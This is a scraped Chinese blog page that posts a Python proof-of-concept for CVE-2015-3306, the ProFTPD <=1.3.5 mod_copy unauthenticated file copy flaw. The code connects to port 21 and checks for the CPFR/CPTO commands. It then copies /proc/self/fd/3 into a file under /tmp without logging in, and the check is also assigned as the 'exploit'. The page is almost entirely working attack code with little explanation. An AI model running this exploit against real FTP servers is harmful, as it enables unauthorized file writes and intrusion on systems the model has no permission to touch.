zoukankan      html  css  js  c++  java
  • ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞

    poc如下:

    #!/usr/bin/env python
    # coding=utf-8

    """
    Site: http://www.beebeeto.com/
    Framework: https://github.com/n0tr00t/Beebeeto-framework
    """

    import random
    import telnetlib

    from baseframe import BaseFrame
    from utils.http import http


    class MyPoc(BaseFrame):
        poc_info = {
            # poc相关信息
            'poc': {
                'id': 'poc-2015-0088',
                'name': 'ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞(CVE-2015-3306) POC',
                'author': 'evi1m0',
                'create_date': '2015-04-20',
            },
            # 协议相关信息
            'protocol': {
                'name': 'ftp',
                'port': [21],
                'layer4_protocol': ['tcp'],
            },
            # 漏洞相关信息
            'vul': {
                'app_name': 'ProFTPD',
                'vul_version': ['<=1.3.5'],
                'type': 'Other',
                'tag': ['ProFTPD漏洞', 'mod_copy漏洞', 'CVE-2015-3306'],
                'desc': '''
                        This candidate has been reserved by an organization or individual that will use it when announcing
                        a new security problem. When the candidate has been publicized, the details for this candidate will be
                        provided.
                        ''',
                'references': ['http://bugs.proftpd.org/show_bug.cgi?id=4169',
                ],
            },
        }

        @classmethod
        def verify(cls, args):
            ip = http.transform_target_ip(http.normalize_url(args['options']['target']))
            if args['options']['verbose']:
                print '[*] {} Connecting...'.format(ip)
            tn = telnetlib.Telnet(ip, port=21, timeout=15)
            tn.write('site help ')
            tn.write('quit ')
            status = tn.read_all()
            if 'CPTO' in status and 'CPFR' in status:
                if args['options']['verbose']:
                    print '[*] Find CPTO & CPFR'
                tn = telnetlib.Telnet(ip, port=21, timeout=15)
                filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)
                tn.write('site cpto evi1m0@beebeeto ')
                tn.write('site cpfr /proc/self/fd/3 ')
                tn.write('site cpto %s '%filename_tmp)
                tn.write('quit ')
                result = tn.read_all()
                if 'Copy successful' in result:
                    args['success'] = True
                    args['poc_ret']['vul_target'] = ip
                    args['poc_ret']['filename'] = filename_tmp
            return args


        exploit = verify


    if __name__ == '__main__':
        from pprint import pprint

        mp = MyPoc()
        pprint(mp.run())

  • 相关阅读:
    Android Service启动原理分析
    线程池原理分析
    仿EventBus做一个简单的基于订阅发布的事件总线
    EventBus原理以及源代码分析
    Android从点击Launcher图标开始到App打开流程分析
    使用LruCache和DiskLruCache手写一个ImageLoader
    OkHttp2连接池复用原理分析
    OkHttp执行流程源码分析
    Android使用动态代理模仿Retrofit的create方法,使其可以返回任意的接口类型
    Android模仿Retrofit的建造者模式
  • 原文地址:https://www.cnblogs.com/milantgh/p/5154851.html
Copyright © 2011-2022 走看看